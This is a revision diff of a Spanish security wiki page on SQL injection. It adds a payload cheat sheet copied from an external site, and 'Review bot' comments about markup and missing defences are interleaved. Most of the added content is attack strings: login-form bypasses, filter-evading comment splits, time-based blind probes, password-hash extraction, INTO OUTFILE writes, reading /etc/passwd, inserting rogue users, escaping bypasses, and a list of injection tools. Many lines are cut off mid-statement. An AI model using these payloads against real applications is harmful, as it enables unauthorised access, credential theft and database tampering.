Differences
seguridad:sql_injection [2013/03/01 14:03] – lc | seguridad:sql_injection [2023/01/18 14:11] (current) – external editor 127.0.0.1 | ||
---|---|---|---|
Line 1: | Line 1: | ||
==== SQL Injection ==== | ==== SQL Injection ==== | ||
=== Técnicas === | === Técnicas === | ||
+ | < | ||
* /**/ | * /**/ | ||
* /*--*/ | * /*--*/ | ||
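Review bot: the opening tag added directly under `=== Técnicas ===` is a bare `<`, and its matching close further down is a bare `</`, while the SQL blocks that follow use a complete `<code sql>` … `</code>`; use the same complete tag here so the comment and line-break sequences (`/**/`, `/*--*/`, `%0A`, `%0D`) are rendered verbatim instead of being interpreted by the wiki parser. A short label beside each entry (comment delimiter versus URL-encoded line break) would also make the list readable without consulting the external source.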
Line 7: | Line 8: | ||
* %0A | * %0A | ||
* %0D | * %0D | ||
+ | </ | ||
+ | === Técnicas extraidas de 0x000000.com | ||
+ | <code sql> | ||
+ | 1 SELECT * FROM login /* foobar */ | ||
+ | 2 SELECT * FROM login WHERE id = 1 or 1=1 | ||
+ | 3 SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE " | ||
+ | </ | ||
+ | Use inside login form: | ||
+ | < | ||
+ | 01 1' OR 1=1-- | ||
+ | 02 1' OR ' | ||
+ | 03 ' | ||
+ | 04 '' | ||
+ | 05 ' | ||
+ | 06 ') or (' | ||
+ | 07 ") or (" | ||
+ | 08 hi" or " | ||
+ | 09 or a=a-- | ||
+ | 10 admin' | ||
+ | 11 ' or 0=0 -- | ||
+ | 12 " or 0=0 -- | ||
+ | 13 or 0=0 -- | ||
+ | 14 ' or ' | ||
+ | 15 " or " | ||
+ | 16 ') or (' | ||
+ | 17 ' or 1=1-- | ||
+ | 18 " or 1=1-- | ||
+ | 19 or 1=1-- | ||
+ | 20 ' or a=a-- | ||
+ | 21 " or " | ||
+ | </ | ||
+ | Variations: | ||
+ | <code sql> | ||
+ | 01 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 | ||
+ | 02 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE " | ||
+ | 03 | ||
+ | 04 SHOW TABLES | ||
+ | 05 SELECT * FROM login WHERE id = 1 or 1=1 AND SHOW TABLES | ||
+ | 06 | ||
+ | 07 SELECT VERSION | ||
+ | 08 SELECT * FROM login WHERE id = 1 or 1=1 AND SELECT VERSION() | ||
+ | 09 | ||
+ | 10 SELECT host, | ||
+ | 11 SELECT * FROM login WHERE id = 1 or 1=1 AND select host, | ||
+ | </ | ||
+ | Blind injection vectors collection | ||
+ | <code sql> | ||
+ | Operators | ||
+ | 1 SELECT 1 && 1; | ||
+ | 2 SELECT 1 || 1; | ||
+ | 3 SELECT 1 XOR 0; | ||
+ | </ | ||
+ | <code sql> | ||
+ | Evaluate | ||
+ | 1 all render TRUE or 1. | ||
+ | 2 SELECT 0.1 <= 2; | ||
+ | 3 SELECT 2 >= 2; | ||
+ | 4 SELECT ISNULL(1/ | ||
+ | </ | ||
+ | <code sql> | ||
+ | Math | ||
+ | 1 SELECT FLOOR(7 + (RAND() * 5)); | ||
+ | 2 SELECT ROUND(23.298, | ||
+ | </ | ||
+ | <code sql> | ||
+ | Misc | ||
+ | 1 SELECT LENGTH(COMPRESS(REPEAT(' | ||
+ | 2 SELECT MD5(' | ||
+ | </ | ||
+ | <code sql> | ||
+ | Benchmark | ||
+ | 01 SELECT BENCHMARK(10000000, | ||
+ | 02 (this takes around 5 sec on a localhost) | ||
+ | 03 | ||
+ | 04 SELECT BENCHMARK(1000000, | ||
+ | 05 (this takes around 7 sec on a localhost) | ||
+ | 06 | ||
+ | 07 SELECT BENCHMARK(10000000, | ||
+ | 08 (this takes around 70 sec on a localhost!) | ||
+ | 09 | ||
+ | 10 Using the timeout to check if user exists | ||
+ | 11 SELECT IF( user = ' | ||
+ | </ | ||
+ | Beware of of the N rounds, add an extra zero and it could stall or crash your browser! | ||
+ | Gathering info | ||
+ | <code sql> | ||
+ | Table mapping | ||
+ | 1 SELECT COUNT(*) FROM tablename | ||
+ | </ | ||
+ | <code sql> | ||
+ | Field mapping | ||
+ | 1 SELECT * FROM tablename WHERE user LIKE " | ||
+ | 2 SELECT * FROM tablename WHERE user LIKE " | ||
+ | 3 SELECT * FROM tablename WHERE user = ' | ||
+ | 4 SELECT * FROM tablename WHERE user = ' | ||
+ | </ | ||
+ | <code sql> | ||
+ | User mapping | ||
+ | 1 SELECT * FROM tablename WHERE email = ' | ||
+ | 2 SELECT * FROM tablename WHERE user LIKE " | ||
+ | 3 SELECT * FROM tablename WHERE user = ' | ||
+ | </ | ||
+ | <code sql> | ||
+ | Advanced SQL vectors | ||
+ | Writing info into files. | ||
+ | 1 SELECT password FROM tablename WHERE username = ' | ||
+ | </ | ||
+ | <code sql> | ||
+ | Writing info into files without single quotes: (example) | ||
+ | 1 SELECT password FROM tablename WHERE username = CONCAT(CHAR(39), | ||
+ | 2 CHAR( 39)) INTO OUTFILE CONCAT(CHAR(39), | ||
+ | 3 CHAR( 39)) | ||
+ | Note: You must specify a new file, it may not exists and give the correct pathname. | ||
+ | </ | ||
+ | <code sql> | ||
+ | The CHAR() quoteless function. | ||
+ | 1 SELECT * FROM login WHERE user = CONCAT(CHAR(39), | ||
+ | 2 CHAR(110), | ||
+ | 3 | ||
+ | 4 SELECT * FROM login WHERE user = CHAR(39, | ||
+ | </ | ||
+ | <code sql> | ||
+ | Extracting hashes | ||
+ | 1 SELECT user FROM login WHERE user = ' | ||
+ | 2 UNION SELECT IF(SUBSTRING(pass, | ||
+ | </ | ||
+ | This evaluates the first char of the password hash from user ' | ||
- | === Herramientas === | + | The hash is max 32 chars, and for every chars you'll need to execute the query with CHAR() |
- | Havij -> http:// | + | |
+ | The way to extract hashes is done this way if single quotes are allowed, see beneath it a quoteless example. | ||
+ | <code sql> | ||
+ | 01 SELECT user FROM login WHERE user = ' | ||
+ | 02 UNION SELECT IF(SUBSTRING(pass, | ||
+ | 03 | ||
+ | 04 1SELECT user FROM login WHERE user = ' | ||
+ | 05 UNION SELECT IF(SUBSTRING(pass, | ||
+ | 06 | ||
+ | 07 where: (passwordfield, | ||
+ | 08 | ||
+ | 09 is like: (password, | ||
+ | 10 is like: (password, | ||
+ | 11 is like: (password, | ||
+ | </ | ||
+ | A quoteless example: | ||
+ | <code sql> | ||
+ | 1 SELECT user FROM login WHERE user = CONCAT(CHAR(39), | ||
+ | 2 UNION SELECT IF(SUBSTRING(pass, | ||
+ | </ | ||
+ | Possible chars | ||
+ | 0 to 9 - ASCII 48 to 57 ~ a to z - ASCII 97 to 122 | ||
+ | Misc. | ||
+ | Insert a new user into DB | ||
+ | <code sql> | ||
+ | 1 INSERT INTO login SET user = ' | ||
+ | </ | ||
+ | Retrieve /etc/passwd file, put it into a field and insert a new user. | ||
+ | < | ||
+ | |||
+ | Then login! | ||
+ | |||
+ | Write the DB user away into tmp | ||
+ | <code sql> | ||
+ | |||
+ | Change admin e-mail, for " | ||
+ | < | ||
+ | |||
+ | Bypassing PHP functions | ||
+ | Bypassing addslashes() with GBK HEX encoding. | ||
+ | < | ||
+ | |||
+ | Using an HEX encoded query to bypass escaping. | ||
+ | <code sql> | ||
+ | 1 Normal: SELECT * FROM login WHERE user = ' | ||
+ | 2 Bypass: SELECT * FROM login WHERE user = 0x726F6F74 | ||
+ | </ | ||
+ | Inserting a new user in SQL. | ||
+ | < | ||
+ | 1 Normal: insert into login set user = ' | ||
+ | 2 Bypass: insert into login set user = 0x726F6F74, pass = 0x726F6F74 | ||
+ | </ | ||
+ | How to determin the HEX value for injection. | ||
+ | <code sql> | ||
+ | |||
+ | With comments. | ||
+ | < | ||
+ | 1 S/ | ||
+ | 2 W/ | ||
+ | </ | ||
+ | Bypassing mysql_real_escape_string() with BIG5 or GBK | ||
+ | < | ||
+ | |||
+ | (MySQL 4.1.x before 4.1.20 and 5.0.x) | ||
+ | |||
+ | |||
+ | ==== Herramientas | ||
+ | | ||
+ | * Havij http:// | ||
+ | * PonyMagic http:// | ||
+ | * General Injection Explorer | ||
+ | * Safe 3 sql injector http:// | ||
+ | * Enema http:// | ||
+ | * Absinthe http:// | ||
+ | * Pangolin http:// | ||
+ | * sql poison | ||
+ | * sql map gui | ||
+ | * bsql hacker http:// | ||
+ | * | ||
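Review bot: the whole `=== Técnicas extraidas de 0x000000.com` section pastes the external listing together with its own line numbers (`01`, `02`, `1`, `2` …) inside `<code sql>` blocks, so none of the snippets can be copied as SQL, and on the `04` line of the second hash-extraction block the number has fused into the statement (`1SELECT user FROM login …`); strip the numbering from every block and move the commentary that currently sits inside the fences (`Operators`, `Evaluate`, `Math`, `Misc`, `Benchmark`, `Table mapping`, `Field mapping`, `User mapping`, `Advanced SQL vectors`, `(this takes around 5 sec on a localhost)`, `Note: You must specify a new file …`) outside them as wiki text. Markup: the headings `=== Técnicas extraidas de 0x000000.com` and `==== Herramientas` lack the closing `===`/`====` that `=== Técnicas ===` and `==== Referencias ====` carry, several blocks open with a bare `<` and close with `</` instead of `<code>`/`</code>`, and `extraidas` is missing its accent (`extraídas`). Prose: `Beware of of the N rounds` → `Beware of the N rounds`, `for every chars` → `for every char`, `it may not exists` → `it must not already exist`, `How to determin` → `How to determine`, and the `(MySQL 4.1.x before 4.1.20 and 5.0.x)` scope belongs on the `Bypassing mysql_real_escape_string() with BIG5 or GBK` heading itself rather than as a detached line three rows below it. Content: the page now documents only techniques and tools, so for a security wiki each technique should be paired with its defence, at minimum that prepared statements with bound parameters render every `' or 1=1--` style entry in the login-form list inert, that the `INTO OUTFILE` vectors depend on the database account holding file-writing privileges (a least-privilege application account has none), and that the `BENCHMARK()` queries the page itself times at 5, 7 and 70 seconds are exactly what a slow-query log exists to surface. Tools list: `General Injection Explorer`, `sql poison` and `sql map gui` have no link while the other entries do, and there are two empty bullets (the one directly under `==== Herramientas` and the trailing `*`); add the links or drop those items.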
Line 17: | Line 223: | ||
==== Referencias ==== | ==== Referencias ==== | ||
* http:// | * http:// | ||
+ | * http:// |
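Review bot: both entries under `==== Referencias ====` render as a bare `http://` (the pre-existing one and the newly added one), so the links need to be verified and completed; and since the new section is titled `Técnicas extraidas de 0x000000.com`, the source it was extracted from should be cited here with a full URL rather than only in the heading.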